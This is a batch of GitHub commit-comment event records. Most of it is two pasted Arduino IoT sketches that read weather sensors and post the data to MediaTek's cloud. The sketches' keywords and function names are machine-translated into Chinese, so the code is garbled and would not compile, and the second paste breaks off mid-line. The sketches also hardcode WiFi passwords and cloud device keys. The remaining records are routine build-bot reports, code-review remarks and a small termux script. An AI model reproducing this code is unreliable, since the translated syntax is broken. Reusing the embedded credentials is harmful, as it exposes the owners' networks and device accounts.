{"id":"8026756501","type":"CommitCommentEvent","actor":{"login":"kuominglu"},"repo":{"name":"kuominglu/pi"},"payload":{"comment":{"id":29854268,"position":null,"line":null,"path":null,"commit_id":"2c9d923e63c5d89003bb32dbdbee7fcb23ac070f","created_at":"2018-07-27T06:15:24Z","updated_at":"2018-07-27T06:15:24Z","author_association":"OWNER","body":"// 2017 CAVEDU\r\n＃包括 < LTask.h >\r\n＃包括 < LWiFi.h >\r\n＃包括 < LWiFiClient.h >\r\n＃包括 < Wire.h >\r\n＃包括 < math.h中>\r\n＃包括 < LDateTime.h >\r\n＃包括 < HttpClient.h >\r\n\r\n＃定義 BMP085_ADDRESS  0x77    // BMP085的I2C地址\r\nconst  unsigned  char OSS = 0 ;  //過採樣設置\r\n//校準值\r\nint16_t ac1，ac2，ac3;\r\nuint16_t ac4，ac5，ac6;\r\nint16_t b1，b2，mb，mc，md;\r\n\r\nint state = 0 ;\r\nint i = 0 ;\r\n\r\n// b5是在bmp085GetTemperature（...）中計算的，這個變量也用在bmp085GetPressure（...）中\r\n// so ...溫度（...）必須在......壓力（...）之前調用。\r\n長 b5;\r\nunsigned  int rtc;\r\nunsigned  int lrtc;\r\nunsigned  int lrtc2;\r\nunsigned  int rtc2;\r\nunsigned  int rtc1;\r\nunsigned  int lrtc1;\r\n＃定義 sht21address B1000000\r\n＃定義 sht21temp   B11110011\r\n＃定義 sht21humid B11110101\r\n＃定義 WIFI_AP  “ MiFi4620LE Jetpack的1C04安全”\r\n＃定義 WIFI_PASSWORD  “ a248b26c ”\r\n＃定義 WIFI_AUTH LWIFI_WPA   //從LWIFI_OPEN，LWIFI_WPA，或LWIFI_WEP選擇。\r\n＃定義 SITE_URL  “ api.mediatek.com ”\r\n＃限定 每 5\r\n＃定義 PER1  50\r\n＃定義 DEVICEID  “ DtVa0VgS ”\r\n＃定義 DEVICEKEY  “ 0xVqfFbnoDeIuv6d ”\r\nLWiFiClient c;\r\nLWiFiClient c2;\r\nchar port [ 5 ] = “     ” ;\r\nchar connection_info [ 21 ] = “                     ” ;\r\nchar ip [ 15 ] = “               ” ;\r\nint portnum;\r\nint val = 0 ;\r\nString tcpdata = String（DEVICEID）+ “，” + String（DEVICEKEY）+ “，0 ” ;\r\nString tcpcmd_led_on = String（DEVICEID）+ “，” + String（DEVICEKEY）+ “，0，fan_control，on ” ;\r\nString tcpcmd_led_off = String（DEVICEID）+ “，” + String（DEVICEKEY）+ “，0，fan_control，off ” ;\r\nString upload_led;\r\nHttpClient http（c2）;\r\n\r\nvoid  setup（）{\r\n  線。begin（）;\r\n  bmp085Calibration（）;\r\n  LTask。begin（）;\r\n  LWiFi。begin（）;\r\n  串行。開始（115200）;\r\n  while（！Serial）延遲（1000）; //準備好演示時標記這個\r\n  串行。println（“連接到AP ”）;\r\n  而（0 == LWiFi。連接（WIFI_AP，LWiFiLoginInfo（WIFI_AUTH，WIFI_PASSWORD）））\r\n  {\r\n    延遲（1000）;\r\n  }\r\n \r\n  延遲（100）;\r\n  pinMode（12，OUTPUT）;\r\n  digitalWrite（12，HIGH）;\r\n  串行。打印（“ LED設置為LOW ”）;\r\n  // connection（）;\r\n  LDateTime。getRtc（＆lrtc）;\r\n  LDateTime。getRtc（＆lrtc2）;\r\n  而（！C2。連接（SITE_URL，80））\r\n  {\r\n     串行。println（“重新連接到WebSite ”）;\r\n     延遲（1000）;\r\n  }\r\n  延遲（100）;\r\n  getconnectInfo（）;\r\n  connectTCP（）;\r\n}\r\n\r\nvoid  loop（）{\r\n  如果（LWiFi。狀態（）== LWIFI_STATUS_DISCONNECTED）{\r\n    串行。println（“與AP斷開連接”）;\r\n    而（0 == LWiFi。連接（WIFI_AP，LWiFiLoginInfo（WIFI_AUTH，WIFI_PASSWORD）））\r\n    {\r\n      串行。println（“連接到AP ”）;\r\n      延遲（1000）;\r\n    }\r\n  }\r\n\r\n  LDateTime。getRtc（＆rtc）;\r\n  if（（rtc  -  lrtc）> = per）{\r\n    串行。println（“ Senddata ”）;\r\n     senddata（）;\r\n    lrtc = rtc;\r\n  }\r\n  / *   if（（rtc  -  lrtc2）> = 0.3）{\r\n    READDATA（）;\r\n    lrtc2 = rtc;\r\n  } * /\r\n  \r\n  //從MCS服務器檢查TCP套接字命令\r\n  String tcpcmd = “ ” ;\r\n  而（c。可用（））\r\n   {\r\n      int v = c。read（）;\r\n      if（v！=  - 1）\r\n      {\r\n        串行。print（（char）v）;\r\n        tcpcmd + =（char）v;\r\n        如果（tcpcmd。等號（tcpcmd_led_on））{\r\n          digitalWrite（12，LOW）;\r\n          串行。print（“ Switch FAN ON ”）;\r\n          tcpcmd = “ ” ;\r\n        } 否則 如果（tcpcmd。的equals（tcpcmd_led_off））{  \r\n          digitalWrite（12，HIGH）;\r\n          串行。打印（“ Switch FAN OFF ”）;\r\n          tcpcmd = “ ” ;\r\n        }\r\n      }\r\n   }\r\n  //檢查聽力間隔\r\n  LDateTime。getRtc（＆rtc2）;\r\n  if（（rtc2  -  lrtc2）> = per1）{\r\n    heartBeat（）;\r\n    lrtc2 = rtc2;\r\n  }\r\n}\r\n\r\nvoid  getconnectInfo（）{\r\n  //調用RESTful API來獲取TCP套接字連接\r\n  C2。print（“ GET / mcs / v2 / devices / ”）;\r\n  C2。打印（DEVICEID）;\r\n  C2。println（“ / connections.csv HTTP / 1.1 ”）;\r\n  C2。print（“主持人：”）;\r\n  C2。println（SITE_URL）;\r\n  C2。print（“ deviceKey：”）;\r\n  C2。println（DEVICEKEY）;\r\n  C2。println（“連接：關閉”）;\r\n  C2。println（）;\r\n  \r\n  延遲（500）;\r\n\r\n  int errorcount = 0 ;\r\n  而（！C2。可用（））\r\n  {\r\n    串行。println（“等待HTTP響應：”）;\r\n    串行。println（errorcount）;\r\n    errorcount + = 1 ;\r\n    if（errorcount> 10）{\r\n      C2。停止（）;\r\n      回歸 ;\r\n    }\r\n    延遲（100）;\r\n  }\r\n  int err = http。skipResponseHeaders（）;\r\n\r\n  int bodyLen = http。contentLength（）;\r\n  串行。print（“內容長度為：”）;\r\n  串行。println（bodyLen）;\r\n  串行。println（）;\r\n  char c;\r\n  int ipcount = 0 ;\r\n  int count = 0 ;\r\n  int separater = 0 ;\r\n  而（c2）\r\n  {\r\n    int v = c2。read（）;\r\n    if（v！=  - 1）\r\n    {\r\n      c = v;\r\n      串行。print（c）;\r\n      connection_info [ipcount] = C;\r\n      if（c == '，'）\r\n      分體= ipcount;\r\n      ipcount ++;    \r\n    }\r\n    其他\r\n    {\r\n      串行。println（“不再內容，斷開連接”）;\r\n      C2。停止（）;\r\n    }\r\n  }\r\n  \r\n  串行。print（“連接信息：”）;\r\n  串行。println（connection_info）;\r\n  int i;\r\n  for（i = 0 ; i <separater; i ++）\r\n  {  \r\n     IP [I] = connection_info [I];\r\n  }\r\n  int j = 0 ;\r\n  分體++;\r\n  for（i = separater; i < 21 && j < 4 ; i ++）\r\n  {  \r\n     端口[J] = connection_info [I];\r\n     J ++;\r\n  }\r\n  串行。println（“ TCP套接字連接說明：”）;\r\n  串行。print（“ IP：”）;\r\n  串行。println（ip）;\r\n  串行。print（“ Port：”）;\r\n  串行。println（port）;\r\n  portnum = atoi（port）;\r\n} // getconnectInfo\r\n\r\nvoid  connectTCP（）{\r\n  //使用指定IP和端口與TCP服務器建立TCP連接\r\n  C。停止（）;\r\n  串行。println（“連接到TCP ”）;\r\n  而（0 ==℃。連接（“ 54.255.209.252 ”，443））\r\n  {\r\n     串行。println（“重新連接到TCP ”）;    \r\n     延遲（1000）;\r\n  }  \r\n  串行。println（“發送TCP連接”）;\r\n  C。println（tcpdata）;\r\n  C。println（）;\r\n  串行。println（“等待TCP響應：”）;\r\n} // connectTCP\r\n\r\nvoid  heartBeat（）{\r\n  串行。println（“發送TCP heartBeat ”）;\r\n  C。println（tcpdata）;\r\n  C。println（）;\r\n} // heartBeat\r\n\r\nvoid  senddata（）{\r\n  串行。println（“ senddata的開頭”）;\r\n  float temp = readsht21temp（）;\r\n  float hum = readsht21humidity（）;\r\n  float temperature = bmp085GetTemperature（bmp085ReadUT（））; //必須先打個電話\r\n\r\n  浮壓= 0 ;\r\n  while（壓力< 90000）{\r\n    bmp085GetTemperature（bmp085ReadUT（））;\r\n    pressure = bmp085GetPressure（bmp085ReadUP（））;\r\n  }\r\n  串行。println（“ 1 ”）;\r\n  char buffert [ 5 ];\r\n  char bufferh [ 5 ];\r\n  char bufferp [ 10 ];\r\n  sprintf（buffert，“％。 2f ”，temp）;\r\n  sprintf（bufferh，“％。 2f ”，hum）;\r\n  sprintf（bufferp，“％6.1f ”，壓力）;\r\n  串行。println（“ 2 ”）;\r\n\r\n  String data = “ temperature ,, ” + String（buffert）+ “ \\ n humidity，” + String（bufferh）+ “ \\ n pressure ,, ” + String（bufferp）;\r\n  串行。println（數據）;\r\n\r\n  //    int light = analogRead（A0）;\r\n  //    String data =“1000000013 ,,”+ String（light）;\r\n  int thisLength =數據。長度（）;\r\n  // Serial.println（data）;\r\n  LWiFiClient c2;\r\n  unsigned  long t1 = millis（）;\r\n  而（0 == C2。連接（SITE_URL，80））\r\n  {\r\n    串行。println（“重新連接到WebSite ”）;\r\n    延遲（1000）;\r\n  }\r\n\r\n  延遲（500）;\r\n  串行。println（“發送POST請求”）;\r\n\r\n  C2。print（“ POST / mcs / v2 / devices / ”）;\r\n  C2。打印（DEVICEID）;\r\n  C2。println（“ / datapoints.csv HTTP / 1.1 ”）;\r\n  C2。print（“主持人：”）;\r\n  C2。println（SITE_URL）;\r\n  C2。print（“ deviceKey：”）;\r\n  C2。println（DEVICEKEY）;\r\n  C2。print（“ Content-Length：”）;\r\n  C2。println（thisLength）;\r\n  C2。println（“ Content-Type：text / csv ”）;\r\n  C2。println（“連接：關閉”）;\r\n  C2。println（）;\r\n  C2。println（數據）;\r\n\r\n  String dataget = “ ” ;\r\n  串行。println（“等待HTTP響應：”）;\r\n\r\n  int errorcount = 0 ;\r\n  而（！C2。可用（））\r\n  {\r\n    串行。println（“等待HTTP響應：”）;\r\n    errorcount + = 1 ;\r\n    if（errorcount> 10）{\r\n      C2。停止（）;\r\n      回歸 ;\r\n    }\r\n    延遲（100）;\r\n  }\r\n  而（c2）\r\n  {\r\n    int v = c2。read（）;\r\n    if（v！=  - 1）\r\n    {\r\n      串行。print（char（v））;\r\n      延遲（1）;\r\n    }\r\n    其他\r\n    {\r\n      串行。println（“不再內容，斷開連接”）;\r\n      C2。停止（）;\r\n    }\r\n  }\r\n  延遲（300）;\r\n  unsigned  long t2 = millis（）;\r\n} // senddata\r\n\r\nfloat  readsht21temp（）{\r\n  線。flush（）;\r\n  線。beginTransmission（sht21address）;\r\n  線。寫（sht21temp）;\r\n  線。endTransmission（）;\r\n  延遲（100）;\r\n  線。requestFrom（sht21address，3）;\r\n\r\n  byte msb = Wire。read（）;\r\n  byte lsb = Wire。read（）;\r\n  int t =（msb << 8）+ lsb;\r\n  int crc = Wire。read（）;\r\n\r\n  浮動溫度=  - 46.85 + 175.72 * t / 65536.0 ;\r\n  返回溫度;\r\n}\r\n\r\nfloat  readsht21humidity（）{\r\n  線。flush（）;\r\n  線。beginTransmission（sht21address）;\r\n  線。寫（sht21humid）;\r\n  線。endTransmission（）;\r\n  延遲（100）;\r\n  線。requestFrom（sht21address，3）;\r\n\r\n  byte msb = Wire。read（）;\r\n  byte lsb = Wire。read（）;\r\n  int h =（msb << 8）+ lsb;\r\n  int crc = Wire。read（）;\r\n\r\n  浮動濕度=  - 6 + 125 * h / 65536.0 ;\r\n  返回濕度;\r\n}\r\n\r\nvoid  bmp085Calibration（）\r\n{\r\n  ac1 = bmp085ReadInt（0xAA）;\r\n  ac2 = bmp085ReadInt（0xAC）;\r\n  ac3 = bmp085ReadInt（0xAE）;\r\n  ac4 = bmp085ReadInt（0xB0）;\r\n  ac5 = bmp085ReadInt（0xB2）;\r\n  ac6 = bmp085ReadInt（0xB4）;\r\n  b1 = bmp085ReadInt（0xB6）;\r\n  b2 = bmp085ReadInt（0xB8）;\r\n  mb = bmp085ReadInt（0xBA）;\r\n  mc = bmp085ReadInt（0xBC）;\r\n  md = bmp085ReadInt（0xBE）;\r\n}\r\n\r\n//以攝氏度計算溫度\r\nfloat  bmp085GetTemperature（unsigned  int ut）{\r\n  長 x1，x2;\r\n\r\n  x1 =（（（long）ut  - （long）ac6）*（long）ac5）>> 15 ;\r\n  long a =（long）mc << 11 ;\r\n  long b = x1 + md;\r\n  x2 = a / b;\r\n  b5 = x1 + x2;\r\n  float temp =（（b5 + 8）>> 4）;\r\n  temp = temp / 10 ;\r\n\r\n  回溫;\r\n}\r\n\r\n//計算放棄的壓力\r\n//必須知道校準值\r\n// b5也是必需的，因此必須首先調用bmp085GetTemperature（...）。\r\n//返回的值將以Pa為單位的壓力。\r\nlong  bmp085GetPressure（unsigned  long up）{\r\n  long x1，x2，x3，b3，b6，p;\r\n  無符號 長 b4，b7;\r\n\r\n  b6 = b5  - 4000 ;\r\n  //計算B3\r\n  x1 =（b2 *（b6 * b6）>> 12）>> 11 ;\r\n  x2 =（ac2 * b6）>> 11 ;\r\n  x3 = x1 + x2;\r\n  b3 =（（（（（long）ac1）* 4 + x3）<< OSS）+ 2）>> 2 ;\r\n\r\n  //計算B4\r\n  x1 =（ac3 * b6）>> 13 ;\r\n  x2 =（b1 *（（b6 * b6）>> 12））>> 16 ;\r\n  x3 =（（x1 + x2）+ 2）>> 2 ;\r\n  b4 =（ac4 *（無符號 長）（x3 + 32768））>> 15 ;\r\n\r\n  b7 =（（無符號 長）（向上 -  b3）*（50000 >> OSS））;\r\n  if（b7 < 0x80000000）\r\n    p =（b7 << 1）/ b4;\r\n  其他\r\n    p =（b7 / b4）<< 1 ;\r\n\r\n  x1 =（p >> 8）*（p >> 8）;\r\n  x1 =（x1 * 3038）>> 16 ;\r\n  x2 =（ - 7357 * p）>> 16 ;\r\n  p + =（x1 + x2 + 3791）>> 4 ;\r\n\r\n  long temp = p;\r\n  回溫;\r\n}\r\n\r\n//從“地址”的BMP085讀取1個字節\r\nchar  bmp085Read（unsigned  char address）\r\n{\r\n  unsigned  char數據;\r\n\r\n  線。beginTransmission（BMP085_ADDRESS）;\r\n  線。寫（地址）;\r\n  線。endTransmission（）;\r\n\r\n  線。requestFrom（BMP085_ADDRESS，1）;\r\n  而（！線可用（））;\r\n\r\n  返回電線。read（）;\r\n}\r\n\r\n//從BMP085讀取2個字節\r\n//第一個字節來自'地址'\r\n//第二個字節來自'地址'+ 1\r\nint  bmp085ReadInt（unsigned  char address）\r\n{\r\n  unsigned  char msb，lsb;\r\n\r\n  線。beginTransmission（BMP085_ADDRESS）;\r\n  線。寫（地址）;\r\n  線。endTransmission（）;\r\n\r\n  線。requestFrom（BMP085_ADDRESS，2）;\r\n  而（電線。可用的（）< 2）\r\n    ;\r\n  msb =電線。read（）;\r\n  lsb =電線。read（）;\r\n\r\n  return（int）msb << 8 | LSB;\r\n}\r\n\r\n//讀取未補償的溫度值\r\nunsigned  int  bmp085ReadUT（）{\r\n  unsigned  int ut;\r\n\r\n  //將0x2E寫入寄存器0xF4\r\n  //這要求溫度讀數\r\n  線。beginTransmission（BMP085_ADDRESS）;\r\n  線。寫（0xF4）;\r\n  線。寫（0x2E）;\r\n  線。endTransmission（）;\r\n\r\n  //至少等待4.5毫秒\r\n  延遲（5）;\r\n\r\n  //從寄存器0xF6和0xF7讀取兩個字節\r\n  ut = bmp085ReadInt（0xF6）;\r\n\r\n  返回 ;\r\n}\r\n\r\n//讀取未補償的壓力值\r\nunsigned  long  bmp085ReadUP（）{\r\n\r\n  unsigned  char msb，lsb，xlsb;\r\n  unsigned  long up = 0 ;\r\n\r\n  //將0x34 +（OSS << 6）寫入寄存器0xF4\r\n  //請求壓力讀數和過採樣設置\r\n  線。beginTransmission（BMP085_ADDRESS）;\r\n  線。寫（0xF4）;\r\n  線。寫（0x34 +（OSS << 6））;\r\n  線。endTransmission（）;\r\n\r\n  //等待轉換，延遲時間取決於OSS\r\n  延遲（2 +（3 << OSS））;\r\n\r\n  //讀取寄存器0xF6（MSB），0xF7（LSB）和0xF8（XLSB）\r\n  msb = bmp085Read（0xF6）;\r\n  lsb = bmp085Read（0xF7）;\r\n  xlsb = bmp085Read（0xF8）;\r\n\r\n  up =（（（unsigned  long）msb << 16）|（（unsigned  long）lsb << 8）|（unsigned  long）xlsb）>>（8 -OSS）;\r\n\r\n  返回了;\r\n}\r\n\r\nvoid  writeRegister（int deviceAddress，byte address，byte val）{\r\n  線。beginTransmission（deviceAddress）; //開始傳輸到設備\r\n  線。寫（地址）;       //發送寄存器地址\r\n  線。寫（val）;         //發送要寫入的值\r\n  線。endTransmission（）;     //結束傳輸\r\n}\r\n\r\nint  readRegister（int deviceAddress，byte address）{\r\n\r\n  int v;\r\n  線。beginTransmission（deviceAddress）;\r\n  線。寫（地址）; //註冊閱讀\r\n  線。endTransmission（）;\r\n\r\n  線。requestFrom（deviceAddress，1）; //讀一個字節\r\n\r\n  而（！線。可用（））{\r\n    //等等\r\n  }\r\n\r\n  v =電線。read（）;\r\n  返回 v;\r\n}\r\n\r\nfloat  calcAltitude（float pressure）{\r\n\r\n  浮動 A =壓力/ 101325 ;\r\n  浮動 B = 1 / 5.25588 ;\r\n  float C = pow（A，B）;\r\n  C = 1 -  C;\r\n  C = C / 0.0000225577 ;\r\n\r\n  返回 C;\r\n}"}},"created_at":"2018-07-27T06:15:24Z"}
{"id":"8026756703","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29854269,"position":null,"line":null,"path":null,"commit_id":"9655ee264b3c2db52e7cf57fe0d73e331d2e9461","created_at":"2018-07-27T06:15:27Z","updated_at":"2018-07-27T06:15:27Z","author_association":"NONE","body":"159344647-Different-heat-transfer-algorithms-from-reverse-constructions (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2327 of 2327 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9655ee264b3c2db52e7cf57fe0d73e331d2e9461-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9655ee264b3c2db52e7cf57fe0d73e331d2e9461-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9655ee264b3c2db52e7cf57fe0d73e331d2e9461-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.2%25-green.png)</a>\n"}},"created_at":"2018-07-27T06:15:27Z"}
{"id":"8026756887","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29854271,"position":23,"line":44,"path":"lesson4/route.rb","commit_id":"cbfeb12748339b64e590efdccb6693e8c79d1f2b","created_at":"2018-07-27T06:15:31Z","updated_at":"2018-07-27T06:15:31Z","author_association":"NONE","body":"можно добавить в этот класс еще хорошую валидацию\r\nбудет ли маршрут валиден, если при его создании передадут два раза одну и ту же станцию, т.е. два идентичных объекта ?"}},"created_at":"2018-07-27T06:15:31Z"}
{"id":"8026757243","type":"CommitCommentEvent","actor":{"login":"cvirostek"},"repo":{"name":"cvirostek/termux-api"},"payload":{"comment":{"id":29854272,"position":null,"line":null,"path":null,"commit_id":"f725d252d385d00bf6cad2dbd5d653d9b2f8a229","created_at":"2018-07-27T06:15:38Z","updated_at":"2018-07-27T06:15:38Z","author_association":"OWNER","body":"Slightly modified termux-storage-get script:\r\n\r\n```\r\n#!/data/data/com.termux/files/usr/bin/sh\r\nset -e -u\r\n\r\nSCRIPTNAME=termux-storage-get\r\nshow_usage () {\r\n    echo \"Usage: $SCRIPTNAME [path]\"\r\n    echo \"Request a file from the system and output it to the specified path, or the current directory if no path is specified.\"\r\n    exit 0\r\n}\r\n\r\n\r\nwhile getopts :h option\r\ndo\r\n    case \"$option\" in\r\n        h) show_usage;;\r\n        ?) echo \"$SCRIPTNAME: illegal option -$OPTARG\"; exit 1;\r\n    esac\r\ndone\r\nshift $(($OPTIND-1))\r\n\r\nif [ $# -gt 1 ]; then echo \"$SCRIPTNAME: too many arguments\"; exit 1; fi\r\nif [ $# -lt 1 ]; then set '.'; fi\r\n\r\n/data/data/com.termux/files/usr/libexec/termux-api StorageGet --es file \"`realpath \"$1\"`\"\r\n```"}},"created_at":"2018-07-27T06:15:38Z"}
{"id":"8026758643","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29854273,"position":16,"line":15,"path":"lesson4/train.rb","commit_id":"cbfeb12748339b64e590efdccb6693e8c79d1f2b","created_at":"2018-07-27T06:16:06Z","updated_at":"2018-07-27T06:16:06Z","author_association":"NONE","body":"здесь нужно поправить отступы"}},"created_at":"2018-07-27T06:16:06Z"}
{"id":"8026760823","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29854277,"position":null,"line":null,"path":null,"commit_id":"9655ee264b3c2db52e7cf57fe0d73e331d2e9461","created_at":"2018-07-27T06:16:49Z","updated_at":"2018-07-27T06:16:49Z","author_association":"NONE","body":"159344647-Different-heat-transfer-algorithms-from-reverse-constructions (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9655ee264b3c2db52e7cf57fe0d73e331d2e9461-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-27T06:16:49Z"}
{"id":"8026761428","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29854278,"position":39,"line":88,"path":"lesson4/train.rb","commit_id":"cbfeb12748339b64e590efdccb6693e8c79d1f2b","created_at":"2018-07-27T06:17:01Z","updated_at":"2018-07-27T06:17:01Z","author_association":"NONE","body":"валидации в строках 87 и 88 друг-другу противоречат\r\nпоезд теперь создать невозможно ))) всегда одна из валидаций будет недовольна"}},"created_at":"2018-07-27T06:17:01Z"}
{"id":"8026761818","type":"CommitCommentEvent","actor":{"login":"clown1018"},"repo":{"name":"clown1018/TIL"},"payload":{"comment":{"id":29854279,"position":null,"line":null,"path":null,"commit_id":"43eab30f4da3daa0deefc74a69b825eb035bd6c6","created_at":"2018-07-27T06:17:08Z","updated_at":"2018-07-27T06:17:08Z","author_association":"OWNER","body":"Update documents about command line"}},"created_at":"2018-07-27T06:17:08Z"}
{"id":"8026765423","type":"CommitCommentEvent","actor":{"login":"manojrocks0807"},"repo":{"name":"manojrocks0807/Data-Analyst-Projects"},"payload":{"comment":{"id":29854291,"position":null,"line":null,"path":null,"commit_id":"750193133a80c885c3fc06df193c097d214621f8","created_at":"2018-07-27T06:18:16Z","updated_at":"2018-07-27T06:18:16Z","author_association":"OWNER","body":"Deleting on my Own."}},"created_at":"2018-07-27T06:18:16Z"}
{"id":"8026768802","type":"CommitCommentEvent","actor":{"login":"romanz"},"repo":{"name":"romanz/electrs"},"payload":{"comment":{"id":29854315,"position":null,"line":null,"path":null,"commit_id":"526239224af12ffc406820503776008936bc8d11","created_at":"2018-07-27T06:19:21Z","updated_at":"2018-07-27T06:19:21Z","author_association":"OWNER","body":"https://github.com/romanz/electrs/issues/38#issuecomment-408322488"}},"created_at":"2018-07-27T06:19:21Z"}
{"id":"8026769390","type":"CommitCommentEvent","actor":{"login":"kuominglu"},"repo":{"name":"kuominglu/pi"},"payload":{"comment":{"id":29854319,"position":null,"line":null,"path":null,"commit_id":"2c9d923e63c5d89003bb32dbdbee7fcb23ac070f","created_at":"2018-07-27T06:19:32Z","updated_at":"2018-07-27T06:19:32Z","author_association":"OWNER","body":"// 2017 CAVEDU\r\n＃包括 < LTask.h >\r\n＃包括 < LWiFi.h >\r\n＃包括 < LWiFiClient.h >\r\n＃包括 < Wire.h >\r\n＃包括 < math.h中>\r\n＃包括 < LDateTime.h >\r\n＃包括 < HttpClient.h >\r\n＃包括 “ LDHT.h ”\r\n＃定義 DHTPIN  2           //什麼引腳連接到我們\r\n＃限定 DHTTYPE DHT11      //使用DHT11傳感器\r\n\r\nLDHT dht（DHTPIN，DHTTYPE）;\r\nfloat tempC = 0.0，Humi = 0.0 ;\r\n\r\nconst  unsigned  char OSS = 0 ;  //過採樣設置\r\nint state = 0 ;\r\nint i = 0 ;\r\n\r\n// b5是在bmp085GetTemperature（...）中計算的，這個變量也用在bmp085GetPressure（...）中\r\n// so ...溫度（...）必須在......壓力（...）之前調用。\r\n長 b5;\r\nunsigned  int rtc;\r\nunsigned  int lrtc;\r\nunsigned  int lrtc2;\r\nunsigned  int rtc2;\r\nunsigned  int rtc1;\r\nunsigned  int lrtc1;\r\n\r\n＃定義 WIFI_AP  “ cavedu ”\r\n＃定義 WIFI_PASSWORD  “ 12345678 ”\r\n＃定義 WIFI_AUTH LWIFI_WPA   //從LWIFI_OPEN，LWIFI_WPA，或LWIFI_WEP選擇。\r\n＃定義 SITE_URL  “ api.mediatek.com ”\r\n＃限定 每 5\r\n＃定義 PER1  50\r\n＃定義 DEVICEID  “ D4trFIKD ”\r\n＃定義 DEVICEKEY  “ D010YYBptER1dCfp ”\r\nLWiFiClient c;\r\nLWiFiClient c2;\r\nchar port [ 5 ] = “     ” ;\r\nchar connection_info [ 21 ] = “                     ” ;\r\nchar ip [ 15 ] = “               ” ;\r\nint portnum;\r\nint val = 0 ;\r\nString tcpdata = String（DEVICEID）+ “，” + String（DEVICEKEY）+ “，0 ” ;\r\nString upload_led;\r\nHttpClient http（c2）;\r\n\r\nvoid  setup（）{\r\n  LTask。begin（）;\r\n  LWiFi。begin（）;\r\n  串行。開始（115200）;\r\n  while（！Serial）延遲（1000）; //準備好演示時標記這個\r\n  串行。println（“連接到AP ”）;\r\n  而（0 == LWiFi。連接（WIFI_AP，LWiFiLoginInfo（WIFI_AUTH，WIFI_PASSWORD）））\r\n  {\r\n    延遲（1000）;\r\n  }\r\n\r\n  延遲（100）;\r\n  pinMode（12，OUTPUT）;\r\n  digitalWrite（12，HIGH）;\r\n  串行。打印（“ LED設置為LOW ”）;\r\n  // connection（）;\r\n  LDateTime。getRtc（＆lrtc）;\r\n  LDateTime。getRtc（＆lrtc2）;\r\n  而（！C2。連接（SITE_URL，80））\r\n  {\r\n    串行。println（“重新連接到WebSite ”）;\r\n    延遲（1000）;\r\n  }\r\n  延遲（100）;\r\n  getconnectInfo（）;\r\n  connectTCP（）;\r\n}\r\n\r\nvoid  loop（）{\r\n  如果（LWiFi。狀態（）== LWIFI_STATUS_DISCONNECTED）{\r\n    串行。println（“與AP斷開連接”）;\r\n    而（0 == LWiFi。連接（WIFI_AP，LWiFiLoginInfo（WIFI_AUTH，WIFI_PASSWORD）））\r\n    {\r\n      串行。println（“連接到AP ”）;\r\n      延遲（1000）;\r\n    }\r\n  }\r\n\r\n  LDateTime。getRtc（＆rtc）;\r\n  if（（rtc  -  lrtc）> = per）{\r\n    串行。println（“ Senddata ”）;\r\n    senddata（）;\r\n    lrtc = rtc;\r\n  }\r\n\r\n  //檢查聽力間隔\r\n  LDateTime。getRtc（＆rtc2）;\r\n  if（（rtc2  -  lrtc2）> = per1）{\r\n    heartBeat（）;\r\n    lrtc2 = rtc2;\r\n  }\r\n}\r\n\r\nvoid  getconnectInfo（）{\r\n  //調用RESTful API來獲取TCP套接字連接\r\n  C2。print（“ GET / mcs / v2 / devices / ”）;\r\n  C2。打印（DEVICEID）;\r\n  C2。println（“ / connections.csv HTTP / 1.1 ”）;\r\n  C2。print（“主持人：”）;\r\n  C2。println（SITE_URL）;\r\n  C2。print（“ deviceKey：”）;\r\n  C2。println（DEVICEKEY）;\r\n  C2。println（“連接：關閉”）;\r\n  C2。println（）;\r\n\r\n  延遲（500）;\r\n\r\n  int errorcount = 0 ;\r\n  而（！C2。可用（））\r\n  {\r\n    串行。println（“等待HTTP響應：”）;\r\n    串行。println（errorcount）;\r\n    errorcount + = 1 ;\r\n    if（errorcount> 10）{\r\n      C2。停止（）;\r\n      回歸 ;\r\n    }\r\n    延遲（100）;\r\n  }\r\n  int err = http。skipResponseHeaders（）;\r\n\r\n  int bodyLen = http。contentLength（）;\r\n  串行。print（“內容長度為：”）;\r\n  串行。println（bodyLen）;\r\n  串行。println（）;\r\n  char c;\r\n  int ipcount = 0 ;\r\n  int count = 0 ;\r\n  int separater = 0 ;\r\n  而（c2）\r\n  {\r\n    int v = c2。read（）;\r\n    if（v！=  - 1）\r\n    {\r\n      c = v;\r\n      串行。print（c）;\r\n      connection_info [ipcount] = c;\r\n      if（c == '，'）\r\n        separater = ipcount;\r\n      ipcount ++;\r\n    }\r\n    其他\r\n    {\r\n      串行。println（“不再內容，斷開連接”）;\r\n      C2。停止（）;\r\n    }\r\n  }\r\n\r\n  串行。print（“連接信息：”）;\r\n  串行。println（connection_info）;\r\n  int i;\r\n  for（i = 0 ; i <separater; i ++）\r\n  {\r\n    ip [i] = connection_info [i];\r\n  }\r\n  int j = 0 ;\r\n  分體++;\r\n  for（i = separater; i < 21 && j < 4 ; i ++）\r\n  {\r\n    port 